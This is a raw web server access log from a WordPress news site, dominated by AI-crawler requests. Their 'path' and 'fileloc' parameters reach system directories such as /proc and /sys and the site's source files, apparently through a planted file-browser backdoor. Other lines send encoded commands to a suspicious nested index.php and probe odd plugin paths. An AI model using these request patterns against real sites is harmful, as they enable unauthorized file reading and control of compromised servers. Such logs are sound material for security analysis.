216.73.216.104 - - [31/Oct/2025:12:21:44 +0000] "GET /2023/11/24/eric-adams-accused-assault-sparks-new-york-outrage?fileloc=%2F%2Fproc%2F99%2Fsmaps&path=%2F%2Fproc%2F99 HTTP/1.1" 200 12283 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.198 - - [31/Oct/2025:12:21:44 +0000] "GET /?path=//sys/class/net/lo/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/ptp/ptp0/subsystem/ptp1/device/subsystem/drivers/thunderbolt/module HTTP/1.1" 200 20624 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:21:50 +0000] "GET /?path=//sys/class/net/eth0/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:4b/subsystem/drivers/button HTTP/1.1" 200 24442 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
45.227.253.15 - - [31/Oct/2025:12:21:51 +0000] "GET /index.php/jk HTTP/1.1" 200 43 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0.4 Mobile/15E148 Safari/604.1"
74.7.227.198 - - [31/Oct/2025:12:21:54 +0000] "GET /?path=//sys/class/net/eth0/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:4b/subsystem/drivers/battery HTTP/1.1" 200 20900 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:21:57 +0000] "GET /?path=//sys/class/net/eth0/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:4b/subsystem/drivers/power_meter HTTP/1.1" 200 22751 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:22:02 +0000] "GET /?path=//sys/class/net/eth1/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:0e/subsystem/drivers/thermal HTTP/1.1" 200 22683 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
199.85.208.47 - - [31/Oct/2025:12:17:07 +0000] "GET /wp-includes/js/dist/development/development/index.php?ARRAY=7o2230223n313736313931363632372p2231223n22687474703n5p2s5p2s7n733633317631336o6s2r63616r63662r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313931333032372q3265653134316565633962396331393061393266353636626465656132626239222p2232223n223138303439653561333064383765306133613561333766383532646165646636222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231392q35302q35312q36352q37312q38382q3239227q HTTP/1.1" 503 79495 "-" "-"
74.7.227.198 - - [31/Oct/2025:12:22:07 +0000] "GET /?path=//sys/class/net/eth1/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:0e/subsystem/drivers/power_meter HTTP/1.1" 200 22751 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:22:10 +0000] "GET /?path=//sys/class/net/eth1/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:0e/subsystem/drivers/button HTTP/1.1" 200 24442 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:22:13 +0000] "GET /?path=//sys/class/net/eth1/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:0e/subsystem/drivers/battery HTTP/1.1" 200 20900 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:22:19 +0000] "GET /?path=//sys/class/net/eth1/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:0e/subsystem/drivers/tpm_crb HTTP/1.1" 200 20900 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:22:22 +0000] "GET /?path=//sys/class/net/eth0/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:4b/subsystem/drivers/tpm_crb HTTP/1.1" 200 20900 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:22:26 +0000] "GET /?path=//sys/class/net/eth0/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:4b/subsystem/drivers/ec HTTP/1.1" 200 20830 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
199.85.208.47 - - [31/Oct/2025:12:17:27 +0000] "GET /wp-includes/js/dist/development/development/index.php?ARRAY=7o2230223n313736313931363634372p2231223n22687474703n5p2s5p2s7n733633317631336o6s2r63616r63662r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313931333034372q3739343361333562323565303438353430333863313833653730363239663333222p2232223n223138303439653561333064383765306133613561333766383532646165646636222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231392q35302q35312q36352q37312q38382q3239227q HTTP/1.1" 503 79495 "-" "-"
74.7.227.198 - - [31/Oct/2025:12:22:29 +0000] "GET /?path=//sys/class/net/eth0/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:4b/subsystem/drivers/ac HTTP/1.1" 200 20830 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:22:34 +0000] "GET /?path=//sys/class/net/eth1/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:0e/subsystem/drivers/ac HTTP/1.1" 200 20830 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:22:38 +0000] "GET /?path=//sys/class/net/eth1/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:0e/subsystem/drivers/ec HTTP/1.1" 200 20830 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:22:42 +0000] "GET /?path=//sys/class/net/eth0/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:4b/subsystem/drivers/hpet HTTP/1.1" 200 20858 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.153.171 - - [31/Oct/2025:12:22:45 +0000] "GET /page/6?product=514217841 HTTP/1.1" 200 79495 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
199.85.208.47 - - [31/Oct/2025:12:17:47 +0000] "GET /wp-includes/js/dist/development/development/index.php?ARRAY=7o2230223n313736313931363636372p2231223n22687474703n5p2s5p2s7n733633317631336o6s2r63616r63662r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313931333036372q3933633162383239316363643261336634386637663336623035313632386135222p2232223n223138303439653561333064383765306133613561333766383532646165646636222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231392q35302q35312q36352q37312q38382q3239227q HTTP/1.1" 503 79495 "-" "-"
74.7.227.198 - - [31/Oct/2025:12:22:48 +0000] "GET /?path=//sys/class/net/eth0/subsystem/veth40f02be/subsystem/docker0/subsystem/eth0/device/net/eth0/device/subsystem/drivers/ipmi_si/module/sections HTTP/1.1" 200 68978 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:22:51 +0000] "GET /?path=//sys/class/net/lo/subsystem/veth40f02be/master/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:72/subsystem/drivers/thermal HTTP/1.1" 200 22337 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
69.197.179.242 - - [31/Oct/2025:12:21:22 +0000] "GET /wp-content/im10d68e/edit.php?id=577072 HTTP/1.1" 200 - "https://dailygoldindex.com/wp-content/im10d68e/edit.php?id=577072" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.227.198 - - [31/Oct/2025:12:22:55 +0000] "GET /?path=//sys/class/net/lo/subsystem/veth40f02be/master/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:45/subsystem/drivers/thermal HTTP/1.1" 200 22337 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:22:58 +0000] "GET /?path=//sys/class/net/lo/subsystem/veth40f02be/master/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:46/subsystem/drivers/button HTTP/1.1" 200 24069 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:23:01 +0000] "GET /?path=//sys/class/net/lo/subsystem/veth40f02be/subsystem/docker0/subsystem/eth0/device/net/eth0/device/hwmon/hwmon1/device/subsystem/drivers/igb/module/drivers HTTP/1.1" 200 16724 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:23:06 +0000] "GET /?path=//sys/class/net/lo/subsystem/veth40f02be/master/subsystem/eth0/device/net/eth0/device/wakeup/wakeup28/device/subsystem/drivers/ahci/module/drivers HTTP/1.1" 200 16489 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
199.85.208.47 - - [31/Oct/2025:12:18:07 +0000] "GET /wp-includes/js/dist/development/development/index.php?ARRAY=7o2230223n313736313931363638372p2231223n22687474703n5p2s5p2s7n733633317631336o6s2r63616r63662r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313931333038372q3266646230356339653639613361303535653362346565303432346239316632222p2232223n223138303439653561333064383765306133613561333766383532646165646636222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231392q35302q35312q36352q37312q38382q3239227q HTTP/1.1" 503 79495 "-" "-"
74.7.227.198 - - [31/Oct/2025:12:23:08 +0000] "GET /?path=//sys/class/net/eth0/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:4d/subsystem HTTP/1.1" 200 23844 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:23:13 +0000] "GET /?path=//sys/class/net/eth0/subsystem/veth40f02be/brport/bridge/subsystem/eth1/device/net/eth1/device/ptp/ptp1/device/subsystem/drivers/shpchp/module/parameters HTTP/1.1" 200 20931 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:23:19 +0000] "GET /?path=//sys/class/net/lo/subsystem/veth40f02be/master/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:22/subsystem/drivers/thermal HTTP/1.1" 200 22337 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:23:23 +0000] "GET /?path=//sys/class/net/lo/subsystem/veth40f02be/master/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:29/subsystem/drivers/thermal HTTP/1.1" 200 22337 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:23:25 +0000] "GET /?path=//sys/class/net/eth0/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/ptp/ptp0/device/subsystem/drivers/thunderbolt HTTP/1.1" 200 25887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
199.85.208.47 - - [31/Oct/2025:12:18:27 +0000] "GET /wp-includes/js/dist/development/development/index.php?ARRAY=7o2230223n313736313931363730372p2231223n22687474703n5p2s5p2s7n733633317631336o6s2r63616r63662r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313931333130372q6239663336666166616163346437333735316630393632626464323866393839222p2232223n223138303439653561333064383765306133613561333766383532646165646636222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231392q35302q35312q36352q37312q38382q3239227q HTTP/1.1" 503 79495 "-" "-"
74.7.227.198 - - [31/Oct/2025:12:23:30 +0000] "GET /?path=//sys/class/net/eth0/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:4d/subsystem/drivers HTTP/1.1" 200 32137 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:23:35 +0000] "GET /?path=//sys/class/net/eth0/subsystem/veth40f02be/subsystem/docker0/subsystem/eth1/device/net/eth1/device/subsystem/drivers/uhci_hcd/module/drivers HTTP/1.1" 200 16249 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:23:37 +0000] "GET /?path=//sys/class/net/lo/subsystem/veth40f02be/master/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:55/subsystem/drivers/thermal HTTP/1.1" 200 22337 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:23:41 +0000] "GET /?path=//sys/class/net/lo/subsystem/veth40f02be/subsystem/docker0/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:2b/subsystem/drivers/ec HTTP/1.1" 200 20879 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.198 - - [31/Oct/2025:12:23:43 +0000] "GET /?path=//sys/class/net/lo/subsystem/veth40f02be/master/subsystem/eth0/device/net/eth0/device/firmware_node/subsystem/devices/device:43/subsystem/drivers/button HTTP/1.1" 200 24069 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
199.85.208.47 - - [31/Oct/2025:12:18:47 +0000] "GET /wp-includes/js/dist/development/development/index.php?ARRAY=7o2230223n313736313931363732372p2231223n22687474703n5p2s5p2s7n733633317631336o6s2r63616r63662r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313931333132372q6565356532616539396165363538363239653435393166663231393438376138222p2232223n223138303439653561333064383765306133613561333766383532646165646636222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231392q35302q35312q36352q37312q38382q3239227q HTTP/1.1" 503 79495 "-" "-"
216.73.216.104 - - [31/Oct/2025:12:23:48 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fdate.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 12928 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:48 +0000] "GET /2023/11/04/convicted-crypto-exchange-dictator-sam-bankman-fried-on-all-counts-of-fraud?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fjtgbpnr%2Freadme.txt&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fjtgbpnr HTTP/1.1" 200 15196 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:48 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Fms-admin.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 12689 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:48 +0000] "GET /sitemap-pt-post-p19-2023-12.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fsearch%2Fview.asset.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fsearch HTTP/1.1" 200 12793 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:48 +0000] "GET /sitemap-pt-post-p19-2023-12.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Faudio%2Feditor.css&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Faudio HTTP/1.1" 200 12911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:48 +0000] "GET /sitemap-pt-post-p19-2023-12.html?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fnavigation%2Fstyle-rtl.css&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fblocks%2Fnavigation HTTP/1.1" 200 30357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:48 +0000] "GET /2023/11/27/defining-moment-long-term-breadth-indicators-tested?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fimages%2Fimages%2Fcache.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fimages%2Fimages HTTP/1.1" 200 12974 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.198 - - [31/Oct/2025:12:23:48 +0000] "GET /?path=//sys/class/net/eth0/subsystem/veth40f02be/brport/bridge/subsystem/eth0/device/net/eth0/device/ptp/ptp0/device/subsystem/drivers/thunderbolt/module HTTP/1.1" 200 20173 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.104 - - [31/Oct/2025:12:23:48 +0000] "GET /2023/12/01/uncertainty-sparked-by-opecs-oil-cuts-what-lies-ahead?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fzvqqmco%2Fqnsgwkzl.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fzvqqmco HTTP/1.1" 200 31783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:49 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin%2Fedit.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-admin HTTP/1.1" 200 37354 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:49 +0000] "GET /2023/12/01/uncertainty-sparked-by-opecs-oil-cuts-what-lies-ahead?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fqqxxzte%2Freadme.txt&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fqqxxzte HTTP/1.1" 200 15200 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:49 +0000] "GET /2023/12/01/uncertainty-sparked-by-opecs-oil-cuts-what-lies-ahead?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fhujgdkx%2Freadme.txt&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fhujgdkx HTTP/1.1" 200 15196 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:49 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fclass-avif-info.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 44124 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:49 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fclass-wp-duotone.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 56907 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:49 +0000] "GET /2023/12/01/uncertainty-sparked-by-opecs-oil-cuts-what-lies-ahead?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fjnews-breadcrumb%2Freadme.txt&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content%2Fplugins%2Fjnews-breadcrumb HTTP/1.1" 200 13143 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:49 +0000] "GET /2023/11/16/win-big-in-the-north-canadian-north-resources-reaps-1-77-million-from-warrants?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2FText%2FException.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2FText HTTP/1.1" 200 12814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:49 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Flink-template.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 185853 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:49 +0000] "GET /?fileloc=%2F%2Flib64%2Fmysql%2Fplugin%2Fsql_errlog.so&path=%2F%2Flib64%2Fmysql%2Fplugin HTTP/1.1" 200 30454 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:49 +0000] "GET /2023/10/19/unearth-the-power-of-appia-rare-earths-uranium?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Ffeed-rdf.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 15952 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:49 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fsitemaps.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 15884 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:49 +0000] "GET /?fileloc=%2F%2Flib%2Fsystemd%2Fsystemd-user-runtime-dir&path=%2F%2Flib%2Fsystemd HTTP/1.1" 200 41344 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:49 +0000] "GET /2024/01/03/james-bay-reels-as-oceana-rejects-monaro-lithium-project?fileloc=%2F%2Fusr%2Flib64%2Flibsamba-errors.so.1&path=%2F%2Fusr%2Flib64 HTTP/1.1" 200 1589326 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:49 +0000] "GET /page/%22,t+=%22%3C%22+e.getAttribute(%22src%22?path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-content HTTP/1.1" 200 42147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:49 +0000] "GET /2024/01/03/james-bay-reels-as-oceana-rejects-monaro-lithium-project?fileloc=%2Fhome%2Fdailygoldindex%2Fwww%2Fwp-includes%2Fhttps-detection.php&path=%2Fhome%2Fdailygoldindex%2Fwww%2Fwp-includes HTTP/1.1" 200 18745 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:50 +0000] "GET /2023/12/29/appeals-court-overturns-ban-on-apple-watch?fileloc=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes%2Fclass-walker-page.php&path=%2Fhome%2Fdailygoldindex%2Fpublic_html%2Fwp-includes HTTP/1.1" 200 21165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.104 - - [31/Oct/2025:12:23:50 +0000] "GET /?fileloc=%2F%2Flib64%2Fmysql%2Fplugin%2Fauth_gssapi_client.so&path=%2F%2Flib64%2Fmysql%2Fplugin HTTP/1.1" 200 30201 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
